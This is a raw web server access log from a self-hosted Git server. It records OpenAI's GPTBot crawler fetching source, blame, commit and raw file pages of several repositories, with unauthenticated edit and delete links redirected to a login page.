"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:16:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 74.7.227.38] [Length 11030] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:16:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 10499] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:16:20:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:16:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:16:20:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:16:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:16:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:16:20:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:16:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:16:20:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:16:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:16:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 15266] [Gzip 8.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:16:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:16:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:16:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 9832] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:16:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:16:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore?display=source" [Client 74.7.227.38] [Length 12041] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" +[17/Feb/2026:16:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore?display=source" [Client 74.7.227.38] [Length 12042] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" +[17/Feb/2026:16:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py?display=source" [Client 74.7.227.38] [Length 12344] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 74.7.227.38] [Length 11254] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14406] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" +[17/Feb/2026:16:20:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:16:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:16:20:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:16:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:16:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm" [Client 74.7.227.38] [Length 115942] [Gzip 15.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" +[17/Feb/2026:16:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15180] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15179] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:16:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64?display=rendered" [Client 74.7.227.38] [Length 10999] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64?display=source" [Client 74.7.227.38] [Length 11027] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64?display=source" [Client 74.7.227.38] [Length 11058] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py?display=source" [Client 74.7.227.38] [Length 13389] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py?display=source" [Client 74.7.227.38] [Length 16658] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py?display=source" [Client 74.7.227.38] [Length 13360] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py?display=source" [Client 74.7.227.38] [Length 16627] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11664] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" +[17/Feb/2026:16:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11655] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" +[17/Feb/2026:16:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11664] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" +[17/Feb/2026:16:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11661] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" +[17/Feb/2026:16:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11661] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" +[17/Feb/2026:16:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11652] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" +[17/Feb/2026:16:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11663] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" +[17/Feb/2026:16:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11219] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 